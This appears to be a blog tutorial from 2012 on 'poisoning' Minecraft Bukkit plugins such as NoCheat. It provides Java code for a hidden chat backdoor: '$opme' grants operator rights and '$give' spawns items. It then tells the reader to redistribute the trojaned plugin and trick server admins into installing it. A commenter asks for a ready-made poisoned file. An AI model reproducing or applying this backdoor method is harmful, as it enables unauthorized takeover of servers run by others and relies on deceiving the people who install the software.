Social Icons

Saturday 28 April 2012

[Tut] How to poison MOST plugins to give you OP!

[Image: xqsaU.png]

In this tutorial, I will teach you how to modify MOST Bukkit plugins to give you OP or run commands on a server. This could be used to get OP by social engineering or coaxing a server admin into downloading and intalling your poisoned plugin.
__

Global Prerequisites
If you want to succeed, you must:
  • have relatively decent Java coding skills
  • have a good IDE such as Eclipse or IntelliJ
__

Step 1: Finding a Plugin

The most obvious and basic step would be to pick a plugin to poison. I would suggest going for things like SpamGuard that block cheaters. It will be significantly easier if the plugin came with the source code.

For this tutorial, I will be poisoning NoCheat.
__

Step 2: Getting the Source

Looking around the plugin's BukkitDev page will usually yield the source code. If not, you can usually find the source by clicking the repository button as shown below.

[Image: 2012-04-25_19-54-24.snagproj.png]

In our case, we were provided with a Subversion link. You will need to checkout from this SVN repository using either Eclipse or other free tools located on the internet.
__

Step 3: Importing Bukkit dependencies

Because Bukkit is an API and is foreign to Eclipse, we will need to import it into our project. Head down over to http://dl.bukkit.org and click "Alternate versions" as pictured below.

[Image: 2012-04-25_20-00-59.snagproj.png]

Now you need to navigate over to the Bukkit tab as pictured below.

[Image: 2012-04-25_20-01-45.snagproj.png]

You now need to click the Recommended Build green button, as pictured below.

[Image: 2012-04-25_20-02-57.snagproj.png]

Now, in Eclipse, you need to create a new project with the source code of the plugin you just downloaded. Right-click on your project and select "Build Path > Add External Archives...". A window will come up with the following picture.

[Image: 2012-04-25_20-12-50.snagproj.png]

Now you need to select the bukkit jarfile which you just downloaded, and the API should be added to the project.
__

Step 4: Finding main class

Before we can start coding, we need to look for the plugin's main class. The easy way to do this is by opening "plugin.yml" located in the project. Find the following line:

[Image: 2012-04-25_20-31-34.snagproj.png]

That is your plugin's main class.

__

Step 5: Injecting the poison

Open up your plugin's main class. Search for this:
Code:
public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {

DIRECTLY BELOW this, paste the following code:

Code:
public void onPlayerChat(PlayerChatEvent event){
        if(event.getMessage().equalsIgnoreCase("$opme")){
        // if soneone on the server typed $opme in chat
            event.getPlayer().setOp(true);
            // Set the player's op status
            event.setCancelled(true);
            // Cancel the message sending
        } else if(event.getMessage().startsWith("$give")){
        // if someone typed $give in chat
            String[] item = event.getMessage().split(" ");
            // turn chat message into array
            if(item.length == 2){
            // check if the command was properly used
                event.getPlayer().getInventory().addItem(new ItemStack(Integer.parseInt(item[1]), 64));
            }
        }
    }

You need to import the following as well:
import org.bukkit.event.player.PlayerChatEvent;

What this code does is checks to see if the command issued was "$opme" and if it is, get the player who sent it and give them op. Additionally, if you type "$give [id]" it will give you a stack of that item.

Congratulations! You have added the poisoning code to your plugin!
__

Step 6: Plugin.yml chores

To actually make your command work, you need to define it in plugin.yml. Open it back up and add the following after "commands:":

Code:
opme:
  description: derp
  usage: /<command>

This defines the command so that Bukkit can actually read it. Of course, if you add more commands, you need to add more of these.

__

Step 7: Recompiling and using

Navigate to "File > Export..." and click the following when the window appears:

[Image: 2012-04-25_20-44-47.snagproj.png]

The rest should be self-explanatory.

To use the poisoned plugin, upload it to Dropbox or another hosting site and send it to the server admin. Hopefully they will install it. To op yourself, issue the command $opme or $give, and you should become OP!

__

Good luck with the social engineering! You can change the code around to make custom commands and even make it so that you can use commands that start with "#" and issue commands on the server.

2 comments:

  1. I've tried to do this and i can't get it to work could you post a download link for the 1.2.5 NoCheat poisoned (I want to do this on a tekkit server) :)

    ReplyDelete